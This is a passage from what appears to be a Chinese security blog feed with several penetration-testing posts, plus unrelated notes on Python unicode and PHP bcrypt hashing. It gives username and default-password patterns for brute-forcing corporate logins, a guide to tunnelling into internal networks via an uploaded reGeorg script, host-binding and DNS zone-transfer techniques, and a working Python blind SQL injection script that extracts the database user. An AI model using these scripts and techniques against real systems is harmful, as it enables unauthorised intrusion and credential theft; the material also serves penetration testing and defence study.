<p>   为了方便管理以及员工方便记忆,员工的用户名一般是自己的拼音,最常用的是这样的:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">zhangwei</span><br><span class="line">wangwei</span><br><span class="line">wangfang</span><br></pre></td></tr></table></figure></p>
<p>   还有这样的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wei.zhang</span><br><span class="line">wei.wang</span><br><span class="line">fang.wang</span><br></pre></td></tr></table></figure></p>
<p>   正序,反序,简写可组合多达6种<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">zhangwei</span><br><span class="line">zw</span><br><span class="line">zhang.wei</span><br><span class="line">wei.zhang</span><br><span class="line">zhangw</span><br><span class="line">w.zhang</span><br></pre></td></tr></table></figure></p>
<p>   所以也不是看到登录口,就拿top500人名字典去尝试;事先清楚某公司的用户名规则,会使得爆破的准确性和效率更高。话说随着人口的增长(作文写多了),大公司重名的概率,或者相似名(拼音相同)的概率是相当大的。如<figure class="highlight plain"><figcaption><span>李伟,李威,李维,李卫```,那么为了区分这种情况,就有了下面的:</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line">liwei01</span><br><span class="line">liwei02</span><br><span class="line">liwei03</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>
<p>当然最准确的还是先拿下某个邮箱或oa账号后,将里面的通讯录导出来!!!<br>参考:</p>
<blockquote>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0134278" target="_blank" rel="external">对中粮集团的多个系统的渗透测试(已入多个系统)</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-0133495" target="_blank" rel="external">字典大法好之可进入百度糯米运营支撑平台/大客户广告系统/可能进一步入内网</a></p>
</blockquote>
<ul>
<li>密码</li>
</ul>
<p>  密码向来是个难题。这里我把密码分成两种:一是通用型,类似弱口令top10,top100等,相信每个大牛手里都有自己独特的不轻易外传的密码字典;二是针对特定的用户名、公司、系统,从而生成的字典。<br>  通用的top100我就不说了,但是有一类密码普通人不常用,但程序猿特别爱用的,人称<strong>滚键盘</strong>:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">q2w3e4r5t</span><br><span class="line">1qaz@WSX</span><br><span class="line">123456asd</span><br><span class="line">1q2w3e</span><br><span class="line">1qaz@WSX</span><br><span class="line">ZAQ!xsw2</span><br><span class="line">ZAQ!2wsx</span><br><span class="line">2wsx#EDC</span><br><span class="line">@WSX3edc</span><br></pre></td></tr></table></figure></p>
<p>  这种密码我建议可以加入自己的字典,通常有奇效。<br>  如果已经有了可靠的用户名,那么不妨针对这些用户名制作相应的字典,例如<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line">liwei</span><br><span class="line">liwei1989</span><br><span class="line">liwei@1989</span><br><span class="line">1iwei@scu</span><br><span class="line">liweiscu</span><br></pre></td></tr></table></figure></p>
<p>  公司在给员工分配密码的时候,一般都是会有一个默认密码,员工拿到后进行修改。但若是某些员工没有更改密码,那么就可以被利用了。不同公司的默认密码不一样,例如饿了么的常用默认密码,和其公司域名有很大的关系。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ele.me</span><br><span class="line">ele@123</span><br><span class="line">ele.me@123</span><br><span class="line">ele.me5121314</span><br><span class="line">ele@123456789</span><br><span class="line">eleme@3456789</span><br><span class="line">Hello_eleme123</span><br></pre></td></tr></table></figure></p>
<h2 id="0x03-不合法的入口"><a href="#0x03-不合法的入口" class="headerlink" title="0x03 不合法的入口"></a>0x03 不合法的入口</h2><blockquote>
<p>不合法的入口一般指利用漏洞获取某内网机器权限,或者是利用漏洞绕过边界,这方面就不多说。</p>
</blockquote>
<ul>
<li>利用各种漏洞,获取边界某台服务器权限<br>这是最常见的方式,漏洞包括web漏洞、主机漏洞及其他。正如前面所说的,大公司的安全运维人员需要维护数以千计的业务,其中很多的边缘业务肯定是无法完全的保护起来,这些边缘的业务可能长时间无人维护,但却又是在边界上可和内网通信。正所谓“千里之堤,毁于蚁穴”,企业的内部往往是很脆弱的,一旦让攻击者进入边界以内,就如同砧板上的肉,任人宰割。<br>案例:<br><a href="http://www.wooyun.org/bugs/wooyun-2015-0129012" target="_blank" rel="external">东风汽车公司某系统漏洞导致内网漫游(控制大量服务器/数据库/ftp,大量敏感数据泄漏)</a></li>
<li>host绑定,直接访问内网业务<br>简单来说就是服务器内网外网双网卡,web服务器没能对访问者来源做检查,访问者在hosts文件中将内网域名与外网ip绑定,可直接访问内网的业务。<br>案例及说明:<br><a href="http://wps2015.jinglingshu.org/?p=172" target="_blank" rel="external">关于服务器的host绑定的不安全因素</a></li>
<li>SSRF探测内网<br>SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。当然大多数的ssrf能探测到的内网信息有限,可辅助其他漏洞进行渗透。<br>案例:<br><a href="http://www.wooyun.org/bugs/wooyun-2015-0162607" target="_blank" rel="external">知乎主站一处SSRF漏洞可探测内网</a><br><a href="http://www.wooyun.org/bugs/wooyun-2010-099070" target="_blank" rel="external">百度某个从SSRF到内网WebShell</a><br>挖掘经验:<br><a href="http://bobao.360.cn/learning/detail/240.html" target="_blank" rel="external">SSRF漏洞的挖掘经验</a></li>
</ul>
<h2 id="0x04-小结"><a href="#0x04-小结" class="headerlink" title="0x04 小结"></a>0x04 小结</h2><p>  正如电影《Who Am I – No System Is Safe》中描述的一样,没有真正安全的系统,自然也没有真正安全的内网防护体系。对于一个大型互联网公司来说,其实并不是因为他们安全做的不够好,而是守需要考虑的是一个面,而攻只需要一个点,对一个点进行深入的挖掘,一定可以找到突破口,而本身企业的安全建设其实也是一直在提高攻击门槛,并不是无懈可击。</p>
<hr>
<p>参考链接:<br><a href="http://drops.wooyun.org/tips/7831" target="_blank" rel="external">http://drops.wooyun.org/tips/7831</a></p>
]]></content>
<summary type="html">
<h2 id="0x01-企业网络边界"><a href="#0x01-企业网络边界" class="headerlink" title="0x01 企业网络边界"></a>0x01 企业网络边界</h2><p>&emsp;&emsp;我们知道既然要从外围进入内网,那么必然要做的一件事情就是跨越边界,所有这个命门我们也就自然应该在企业的内外网边界上来寻找。
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="内网" scheme="http://wps2015.org/tags/%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>内网渗透之socks5代理(reGeorg+proxifier详细配置说明)</title>
<link href="http://wps2015.org/2016/03/02/Network-infiltration-socks5-agency/"/>
<id>http://wps2015.org/2016/03/02/Network-infiltration-socks5-agency/</id>
<published>2016-03-02T08:48:10.000Z</published>
<updated>2016-12-05T06:56:29.673Z</updated>
<content type="html"><![CDATA[<h3 id="1-首先我们需要明白正向代理和反向代理的区别"><a href="#1-首先我们需要明白正向代理和反向代理的区别" class="headerlink" title="1. 首先我们需要明白正向代理和反向代理的区别"></a>1. 首先我们需要明白正向代理和反向代理的区别</h3><p><strong>1.1 正向代理(Forward Proxy)</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost-->proxy-->Rhost</span><br></pre></td></tr></table></figure>
<p>  Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。<a id="more"></a></p>
<p><strong>1.2 反向代理(reverse proxy</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost<-->proxy<-->firewall<-->Rhost</span><br></pre></td></tr></table></figure>
<p>  和正向代理相反(废话),Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。</p>
<p>  而我们平常使用的reDuh、tunna,和reGeorg一样,都是正向代理。一般都是用户上传一个代理脚本到服务器端,本地的程序去连接服务器上的脚本,脚本程序做代理转发端口和流量。</p>
<h3 id="2-工具介绍"><a href="#2-工具介绍" class="headerlink" title="2. 工具介绍"></a>2. 工具介绍</h3><p><strong>2.1 reGeorg</strong><br>  reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高。</p>
<p>  reGeorg下载地址:<a href="https://github.com/sensepost/reGeorg" target="_blank" rel="external">下载</a></p>
<p><strong>2.2 proxifier</strong></p>
<p>  Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。</p>
<p>  下载地址:<a href="https://www.proxifier.com/" target="_blank" rel="external">下载</a></p>
<p>  激活码: <a href="http://wenku.baidu.com/link?url=T9od33JuA7jjxzfyV-wOjsYyARbVXwuXs2GwWwXLkX6vxRU4Rj0p_e2_0l1A0-WT9NOs3sh1OqDbYBgFYXLyjfconba4FF4iqdoz-tV5GH_" target="_blank" rel="external">查看</a></p>
<h3 id="3-工具配置"><a href="#3-工具配置" class="headerlink" title="3. 工具配置"></a>3. 工具配置</h3><h4 id="reGeorg设置"><a href="#reGeorg设置" class="headerlink" title="reGeorg设置"></a>reGeorg设置</h4><p>先将reGeorg的对应脚本上传到服务器端,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2jKQ4mVXXXXbfXpXXXXXXXXXX_!!792076116.png" alt="clipboard"></p>
<p>运行py程序:<code>python reGeorgSocksProxy.py -p 8888 -u http:www.exemple.com/test/tunnel.jsp</code></p>
<h4 id="proxifier配置"><a href="#proxifier配置" class="headerlink" title="proxifier配置"></a>proxifier配置</h4><p>将proxifier打开,在Proxy Server中这样配置</p>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2nSXwnXXXXXXdXXXXXXXXXXXX_!!792076116.png" alt="clipboard (2)"><br>打开在Proxification Rules,注意规则的设置,默认为Direct<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2JIKRXEdnpuFjSZPhXXbChpXa_!!792076116.png" alt=""><br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2vkyPXstnpuFjSZFKXXalFFXa_!!792076116.png" alt=""><br>然后在远程桌面程序上右键,以Proxifier选择“Proxy SOCKS5 127.0.0.1”打开。ipconfig查询内网机器的ip<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2Xfw2mVXXXXbJXpXXXXXXXXXX_!!792076116.png" alt="clipboard (3)"><br>直接在远程连接上输入内网机器的内网ip<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2hdljnXXXXXclXXXXXXXXXXXX_!!792076116.png" alt="clipboard (4)"><br>点击连接即可。</p>
]]></content>
<summary type="html">
<h3 id="1-首先我们需要明白正向代理和反向代理的区别"><a href="#1-首先我们需要明白正向代理和反向代理的区别" class="headerlink" title="1. 首先我们需要明白正向代理和反向代理的区别"></a>1. 首先我们需要明白正向代理和反向代理的区别</span></h3><p><strong>1.1 正向代理(Forward Proxy)</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Lhost--&gt;proxy--&gt;Rhost</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。
</summary>
<category term="神器而已" scheme="http://wps2015.org/categories/%E7%A5%9E%E5%99%A8%E8%80%8C%E5%B7%B2/"/>
<category term="内网" scheme="http://wps2015.org/tags/%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>关于服务器的host绑定的不安全因素</title>
<link href="http://wps2015.org/2015/09/29/the-unsafe-factors-of-host-binding/"/>
<id>http://wps2015.org/2015/09/29/the-unsafe-factors-of-host-binding/</id>
<published>2015-09-29T08:24:59.000Z</published>
<updated>2016-11-08T01:46:57.610Z</updated>
<content type="html"><![CDATA[<p><strong>1、host主机头</strong><br>host主机头绑定是很多网站常用的一种一机多站的实现方法,相对于使用不同端口来实现一机多站要安全许多,因为端口可以通过暴力手段找到,而host绑定就要难破解很多,因为需要IP和主机名的对应.<a id="more"></a></p>
<p><strong>2、漏洞成因及危害</strong><br>很多网站为了方便管理和节省服务器成本,将内网管理站点和外网站点放置在同一服务器下,使用一机多站来进行隔离.</p>
<p>很多情况下一台服务器安装两块网卡,分别接入外网和内网,方便公网访问公开站点,内网访问管理站点.并绑定host.</p>
<p>例如:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx.com为公开站点,并且指向IP为公网网卡.</span><br><span class="line">admin.xxx.com为管理站点,并且指向内网网卡.</span><br></pre></td></tr></table></figure></p>
<p>看上去好像管理站点admin.xxx.com必须在内网才能访问但是却忽略了host绑定的问题.</p>
<p>但是当我们将外网IP地址强制绑定到admin.xxx.com的时候web服务器又没有做来源检查,那么我们就可以通过外网访问到本来应该只有内网才能访问的管理站点了.</p>
<p>并且由于是内网站点很多情况下管理员为了方便都是弱密码,或者直接未授权访问等</p>
<p><strong>3、漏洞的利用</strong><br>利用的话可以直接使用域名的一个暴力猜解</p>
<p>将外网IP和内网IP的域名全部记录下来</p>
<p>例如<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx.com ip 1.1.1.1</span><br><span class="line">admin.xxx.com ip 10.0.0.1</span><br></pre></td></tr></table></figure></p>
<p>再使用工具将内网域名绑定到外网站点的IP上</p>
<p>写入hosts文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1.1.1 admin.xxx.com</span><br></pre></td></tr></table></figure></p>
<p>即可访问到内网站点了</p>
<p>4、漏洞案例<br><a href="http://www.wooyun.org/bugs/wooyun-2014-081180" target="_blank" rel="external">途牛另类方式导致内网部分敏感系统泄露</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-093577" target="_blank" rel="external">盛大某游戏GM工具注入进入后台</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-088352" target="_blank" rel="external">傲游内网不完整漫游(大量内外网源码可被泄漏)</a></p>
<p><a href="http://www.wooyun.org/bugs/wooyun-2010-0134151" target="_blank" rel="external">一下科技运维不当导致内部敏感信息泄漏</a></p>
<p>转自:<a href="http://wiki.wooyun.org/server:host" target="_blank" rel="external">http://wiki.wooyun.org/server:host</a></p>
]]></content>
<summary type="html">
<p><strong>1、host主机头</strong><br>host主机头绑定是很多网站常用的一种一机多站的实现方法,相对于使用不同端口来实现一机多站要安全许多,因为端口可以通过暴力手段找到,而host绑定就要难破解很多,因为需要IP和主机名的对应.
</summary>
<category term="其他安全" scheme="http://wps2015.org/categories/%E5%85%B6%E4%BB%96%E5%AE%89%E5%85%A8/"/>
<category term="host" scheme="http://wps2015.org/tags/host/"/>
</entry>
<entry>
<title>Mysql布尔盲注脚本</title>
<link href="http://wps2015.org/2015/07/15/script-of-mysql-boolen-based/"/>
<id>http://wps2015.org/2015/07/15/script-of-mysql-boolen-based/</id>
<published>2015-07-15T14:00:44.000Z</published>
<updated>2016-11-08T01:45:14.089Z</updated>
<content type="html"><![CDATA[<p>当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在<a id="more"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">#! usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"></span><br><span class="line">import httplib</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">import sys</span><br><span class="line">import random</span><br><span class="line">import urllib</span><br><span class="line"></span><br><span class="line">headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}</span><br><span class="line">payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')</span><br><span class="line">print 'start to retrive MySQL user:'</span><br><span class="line">user = ''</span><br><span class="line">for i in range(1,21):</span><br><span class="line"> for payload in payloads:</span><br><span class="line"> conn = httplib.HTTPConnection('www.example.com', timeout=4) #连接,host</span><br><span class="line"> s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) #payload</span><br><span class="line"> conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers) #url</span><br><span class="line"> html_header= conn.getresponse().read()</span><br><span class="line"> length=len(html_header)</span><br><span class="line"> if length>10000:</span><br><span class="line"> user+=payload</span><br><span class="line"> sys.stdout.write('\r[In progress] %s' % user)</span><br><span class="line"> sys.stdout.flush()</span><br><span class="line"> break</span><br><span class="line"> else:</span><br><span class="line"> print '.',</span><br><span class="line"> conn.close()</span><br><span class="line"></span><br><span class="line">print '\n[Done]MySQL user is', user</span><br></pre></td></tr></table></figure>
]]></content>
<summary type="html">
<p>当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>DNS域传送漏洞利用方法</title>
<link href="http://wps2015.org/2015/07/13/DNS-domain-and-the-exploit/"/>
<id>http://wps2015.org/2015/07/13/DNS-domain-and-the-exploit/</id>
<published>2015-07-13T03:10:37.000Z</published>
<updated>2016-11-08T01:47:09.076Z</updated>
<content type="html"><![CDATA[<p>其实利用方法分为手工和工具两种,我们可以利用BT5下面的工具Dnsenum或者是其它工具,手工的话就利用nslookup即可。<a id="more"></a></p>
<p><strong>1、使用工具来获取DNS信息</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /pentest/enumeration/dns/dnsenum</span><br><span class="line">./dnsenum.pl –enum domain.com</span><br></pre></td></tr></table></figure>
<p>这样就可以简单的利用了。</p>
<p><strong>2、使用手工的方法,推荐。</strong><br>方法如下图。查询过程如图所显示:</p>
<p>[<img src="http://www.wooyun.org/upload/201202/15161935b7b1610dcdc653216971d50b16c5e88f.jpg" alt="1259002Mo"><br>查询结果保存在189store.com.txt中<br>使用如下指令查看<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view 189store.com.txt</span><br></pre></td></tr></table></figure></p>
<p>有74条记录</p>
<p>[<img src="http://www.wooyun.org/upload/201202/1516215365c2c8081bb7ba32c7a37bab4b020d78.jpg" alt="125900JRF">]<br>[<img src="http://www.wooyun.org/upload/201202/15162218a04914ae310f75e599a22b128ec49f4b.jpg" alt="125901P6x">]</p>
<p><strong>3.漏洞证明:</strong></p>
<p>见上面的详细说明</p>
<p><strong>4.修复方案:</strong></p>
<p>ns.westidc.com.cn(221.236.9.9) 与 ns.westidc.net.cn(210.77.146.30) 都没有做访问控制<br>定义ACL(访问控制列表)来限制在域名服务器之间的区域传送<br>编辑/etc/named.conf<br>在189store.com的zone配置中设置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">allow-transfer { localhost; 221.236.9.9; };</span><br><span class="line">或</span><br><span class="line">allow-transfer { localhost; 210.77.146.30; };</span><br></pre></td></tr></table></figure></p>
<p>原文:<a href="http://www.waitalone.cn/post/DNSTransfer.html" target="_blank" rel="external">http://www.waitalone.cn/post/DNSTransfer.html</a></p>
]]></content>
<summary type="html">
<p>其实利用方法分为手工和工具两种,我们可以利用BT5下面的工具Dnsenum或者是其它工具,手工的话就利用nslookup即可。
</summary>
<category term="其他安全" scheme="http://wps2015.org/categories/%E5%85%B6%E4%BB%96%E5%AE%89%E5%85%A8/"/>
<category term="DNS" scheme="http://wps2015.org/tags/DNS/"/>
</entry>
<entry>
<title>python unicode字节串转成中文问题 (转)</title>
<link href="http://wps2015.org/2015/06/18/the-problem-of-python-chinese/"/>
<id>http://wps2015.org/2015/06/18/the-problem-of-python-chinese/</id>
<published>2015-06-18T02:14:26.000Z</published>
<updated>2016-11-08T01:45:23.348Z</updated>
<content type="html"><![CDATA[<p>  如题,其实我的问题很简单,就是在写爬虫的时候拿到网页的信息包含类似”\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c”的字符串,实际上这是unicode的中文编码,对应的中文为“新浪微博注册”。其实我就是想找一个函数让这一串东西显示中文而已,没想到百度了白天找到合适的。<a id="more"></a>遇到这种问题千万不要用什么 “python编码” “unicode中文编码” “unicode解码”这样的关键字去搜,一大堆网页出来毫不相关。<br>  其实这个问题一个函数搞定,如下:<br>Example 1:<br>>>> s = r”\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c”<br>>>> s<br>‘\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c’<br>>>> print s<br>\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c<br>>>> s = s.decode(“unicode_escape”); #就是这个函数<br>>>> print s</p>
<p>Example 2:<br>>>> str<em> = “Russopho\xe9bic, clichd and just pl\xe9ain stupid.”<br>>>> print str</em><br>Russopho?bic, clichd and just pl?ain stupid.<br>>>> str<em> = str</em>.decode(“unicode<em>escape”)<br>>>> print str</em><br>  这个方法解决了我在插入数据到mongodb时遇到的“bson.errors.InvalidStringData: strings in documents must be valid UTF-8”问题。<br>  附上关于这个问题的相关博客链接:<a href="http://www.cnblogs.com/yangze/archive/2010/11/16/1878469.html" target="_blank" rel="external">戳这里</a>。另外还有一个与unicode字节串有关的问题,遇到这样的错误提示:Unicode equal comparison failed to convert both arguments to Unicode - interpreting them as being unequal。说明我们在对两个字符(串)进行对比的时候等号两边的类型<br>不一样,可能是一边是unicode字节串,一边是字符串。详见<a href="http://stackoverflow.com/questions/3400171/python-utf-8-comparison。" target="_blank" rel="external">http://stackoverflow.com/questions/3400171/python-utf-8-comparison。</a></p>
<p>小结:<br>以后遇到奇葩问题要想好关键字再搜,不然很有可能一无所获。</p>
<hr>
<p>转:<a href="http://windkeepblow.blog.163.com/blog/static/1914883312013988185783/" target="_blank" rel="external">http://windkeepblow.blog.163.com/blog/static/1914883312013988185783/</a></p>
]]></content>
<summary type="html">
<p>&emsp;&emsp;如题,其实我的问题很简单,就是在写爬虫的时候拿到网页的信息包含类似”\u65b0\u6d6a\u5fae\u535a\u6ce8\u518c”的字符串,实际上这是unicode的中文编码,对应的中文为“新浪微博注册”。其实我就是想找一个函数让这一串东西显示中文而已,没想到百度了白天找到合适的。
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>PHP5.5使用Bcrypt加密密码</title>
<link href="http://wps2015.org/2015/05/21/Bcrypt-in-php5.5/"/>
<id>http://wps2015.org/2015/05/21/Bcrypt-in-php5.5/</id>
<published>2015-05-21T06:58:55.000Z</published>
<updated>2016-12-23T07:06:45.621Z</updated>
<content type="html"><![CDATA[<p>在php5.5中,加入了一个新的密码哈希函数,可使用Bcrypt轻松实现加盐的安全密码。</p>
<p>bcrypt和其他对称或非对称加密方式不同的是,不是直接解密得到明文,也不是二次加密比较密文,而是把明文和存储的密文一块运算得到另一个密文,如果这两个密文相同则验证成功。<a id="more"></a></p>
<p>官方手册在这里: <a href="http://cn2.php.net/manual/zh/book.password.php" target="_blank" rel="external">http://cn2.php.net/manual/zh/book.password.php</a></p>
<p>生成密钥</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$hash = password_hash(<span class="string">'password'</span>,PASSWORD_BCRYPT,[<span class="string">'cost'</span> => <span class="number">10</span>]);</span><br><span class="line"><span class="keyword">echo</span> $hash;</span><br></pre></td></tr></table></figure>
<p>password_hash() —-加密密码<br>第一个参数:需要加密的密码<br>第二个参数:密码算法常量 (<a href="http://cn2.php.net/manual/zh/password.constants.php" target="_blank" rel="external">http://cn2.php.net/manual/zh/password.constants.php</a>)<br>第三个参数:数组类型。支持两个选项:salt在散列密码时加的盐(干扰字符串)。cost用来指明算法递归的层数。</p>
<p>上面代码每次运行生成的密钥不同,大致效果如下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="number">2</span>y$<span class="number">10</span>$bWNfw6QbjmjyCDBc9lrZRuBjraxBzN7eAuozS6D3r4QxJn0tgXRwe</span><br></pre></td></tr></table></figure>
<p>生成的密钥长度为60位,所以设计数据库的时候需要注意。</p>
<p>验证密钥</p>
<p>懒得存数据库再去取了,直接把刚生成的密钥复制过来了~~</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$hash = <span class="string">'$2y$10$bWNfw6QbjmjyCDBc9lrZRuBjraxBzN7eAuozS6D3r4QxJn0tgXRwe'</span>;</span><br><span class="line">$res = password_verify(<span class="string">'password'</span>,$hash);</span><br><span class="line">var_dump($res);</span><br></pre></td></tr></table></figure>
<p>如果没有天灾人祸意外发生的话。你会看到下面的输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bool(true)</span><br></pre></td></tr></table></figure>
<p>这就成功了。</p>
<p>性能</p>
<p>下面我们来看看Bcrypt的性能,安全性的提升,肯定是以性能为代价。bcrypt要加强密码安全性,增加运行时间也是肯定的。那我们现在就测试一下Bcrypt与普通md5的速度。</p>
<p>测试机性能:</p>
<p>CPU I7 4核 2.3G主频<br>内存 16G ddr3 内存<br>系统 Mac<br>PHP 5.5.15</p>
<p>现在用下面这段代码分别测试一下md5和Bcrypt在不加盐的情况下的运行速度<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$s_time = microtime(<span class="keyword">true</span>);</span><br><span class="line">password_hash(<span class="string">'password'</span>,PASSWORD_BCRYPT,[<span class="string">'cost'</span> => <span class="number">10</span>]);</span><br><span class="line"><span class="comment">// md5('password');</span></span><br><span class="line">$e_time = microtime(<span class="keyword">true</span>);</span><br><span class="line">$run_time = $e_time-$s_time;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> ($run_time*<span class="number">1000</span>).<span class="string">'ms'</span>;</span><br></pre></td></tr></table></figure></p>
<p>Bcrypt 5次运行结果<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">68.569183349609ms</span><br><span class="line">68.006992340088ms</span><br><span class="line">69.074869155884ms</span><br><span class="line">68.211078643799ms</span><br><span class="line">68.757057189941ms</span><br></pre></td></tr></table></figure></p>
<p>md5 5次运行结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0.0040531158447266ms</span><br><span class="line">0.0040531158447266ms</span><br><span class="line">0.0050067901611328ms</span><br><span class="line">0.0040531158447266ms</span><br></pre></td></tr></table></figure>
<p>测试结果</p>
